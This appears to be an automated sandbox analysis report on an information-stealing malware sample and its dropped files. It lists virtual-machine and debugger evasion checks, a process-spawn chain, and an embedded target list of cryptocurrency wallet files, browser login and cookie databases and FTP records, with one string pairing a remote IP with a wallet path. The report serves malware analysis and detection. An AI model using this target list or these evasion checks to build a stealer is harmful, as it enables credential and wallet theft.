Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: skotes.exe, skotes.exe, 00000014.00000002.2651951754.0000000000C02000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: CFBFCGID.0.dr Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: CFBFCGID.0.dr Binary or memory string: discord.comVMware20,11696494690f
Source: CFBFCGID.0.dr Binary or memory string: AMC password management pageVMware20,11696494690
Source: CFBFCGID.0.dr Binary or memory string: outlook.office.comVMware20,11696494690s
Source: CFBFCGID.0.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: CFBFCGID.0.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: CFBFCGID.0.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: CFBFCGID.0.dr Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: CFBFCGID.0.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: CFBFCGID.0.dr Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: CFBFCGID.0.dr Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: CFBFCGID.0.dr Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: file.exe, 00000000.00000002.1975584108.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1975584108.0000000000F74000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000014.00000002.2653686921.00000000012B9000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000014.00000002.2653686921.000000000128A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: CFBFCGID.0.dr Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: CFBFCGID.0.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: CFBFCGID.0.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: CFBFCGID.0.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: CFBFCGID.0.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: CFBFCGID.0.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: CFBFCGID.0.dr Binary or memory string: tasks.office.comVMware20,11696494690o
Source: file.exe, 00000000.00000002.1970779986.00000000003A1000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: iMSHN6QKQEMUh;=a
Source: CFBFCGID.0.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: file.exe, 00000000.00000002.1970779986.00000000003A1000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: MSHN6QKQEMU
Source: skotes.exe, 00000014.00000002.2653686921.000000000129E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}yi
Source: CFBFCGID.0.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: CFBFCGID.0.dr Binary or memory string: dev.azure.comVMware20,11696494690j
Source: CFBFCGID.0.dr Binary or memory string: global block list test formVMware20,11696494690
Source: file.exe, 00000000.00000002.1975584108.0000000000F2E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: CFBFCGID.0.dr Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: KJJJKFIIIJ.exe, 00000010.00000003.1975732936.0000000000906000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\P
Source: CFBFCGID.0.dr Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: CFBFCGID.0.dr Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: CFBFCGID.0.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: file.exe, 00000000.00000002.1971873574.0000000000781000.00000040.00000001.01000000.00000003.sdmp, KJJJKFIIIJ.exe, 00000010.00000002.2007017936.0000000000B42000.00000040.00000001.01000000.0000000B.sdmp, skotes.exe, 00000011.00000002.2038364209.0000000000C02000.00000040.00000001.01000000.0000000E.sdmp, skotes.exe, 00000012.00000002.2037916036.0000000000C02000.00000040.00000001.01000000.0000000E.sdmp, skotes.exe, 00000014.00000002.2651951754.0000000000C02000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: CFBFCGID.0.dr Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: CFBFCGID.0.dr Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: CFBFCGID.0.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: CFBFCGID.0.dr Binary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe Process queried: DebugPort
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe Process queried: DebugPort
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe Code function: 16_2_04A206B3 rdtsc 16_2_04A206B3
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CC3AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6CC3AC62
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe Code function: 16_2_0098652B mov eax, dword ptr fs:[00000030h] 16_2_0098652B
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe Code function: 16_2_0098A302 mov eax, dword ptr fs:[00000030h] 16_2_0098A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 17_2_00A4A302 mov eax, dword ptr fs:[00000030h] 17_2_00A4A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 17_2_00A4652B mov eax, dword ptr fs:[00000030h] 17_2_00A4652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 18_2_00A4A302 mov eax, dword ptr fs:[00000030h] 18_2_00A4A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 18_2_00A4652B mov eax, dword ptr fs:[00000030h] 18_2_00A4652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 20_2_00A4A302 mov eax, dword ptr fs:[00000030h] 20_2_00A4A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 20_2_00A4652B mov eax, dword ptr fs:[00000030h] 20_2_00A4652B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CC3AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6CC3AC62
Source: C:\Users\user\Desktop\file.exe Memory protected: page guard

HIPS / PFW / Operating System Protection Evasion

Source: Yara match File source: Process Memory Space: file.exe PID: 7688, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\Documents\KJJJKFIIIJ.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\Documents\KJJJKFIIIJ.exe "C:\Users\user\Documents\KJJJKFIIIJ.exe"
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CC84760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free, 0_2_6CC84760
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB61C30 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLengthSid,malloc,CopySid,CopySid,GetTokenInformation,GetLengthSid,malloc,CopySid,CloseHandle,AllocateAndInitializeSid,GetLastError,PR_LogPrint, 0_2_6CB61C30
Source: file.exe, 00000000.00000002.1972169085.00000000007C7000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Program Manager
Source: KJJJKFIIIJ.exe, 00000010.00000002.2007325885.0000000000B83000.00000040.00000001.01000000.0000000B.sdmp, skotes.exe, 00000011.00000002.2038651683.0000000000C43000.00000040.00000001.01000000.0000000E.sdmp, skotes.exe, 00000012.00000002.2038172550.0000000000C43000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: cProgram Manager
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CC3AE71 cpuid 0_2_6CC3AE71
Source: C:\Users\user\Desktop\file.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\Desktop\file.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1012783001\5762ea743c.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1012783001\5762ea743c.exe VolumeInformation
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CC3A8DC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_6CC3A8DC
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 20_2_00A165E0 LookupAccountNameA, 20_2_00A165E0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 20_2_00A52517 GetTimeZoneInformation, 20_2_00A52517
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB88390 NSS_GetVersion, 0_2_6CB88390

Stealing of Sensitive Information

Source: Yara match File source: 17.2.skotes.exe.a10000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.skotes.exe.a10000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.skotes.exe.a10000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.KJJJKFIIIJ.exe.950000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000011.00000002.2037822618.0000000000A11000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2037351297.0000000000A11000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2651137174.0000000000A11000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2006010941.0000000000951000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 0.2.file.exe.3a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1975584108.0000000000F2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1970779986.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 7688, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: Process Memory Space: file.exe PID: 7688, type: MEMORYSTR
Source: file.exe, 00000000.00000002.1975584108.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.1975584108.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\*.*es
Source: file.exe, 00000000.00000002.1975584108.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.1975584108.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.1975584108.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.1975584108.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: 16.113Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\*.*
Source: file.exe, 00000000.00000002.1975584108.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: 185.215.113.16\AppData\Roaming\\MultiDoge\\multidoge.wallet
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite-wal
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite-shm
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite-shm
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\prefs.js
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite-wal
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
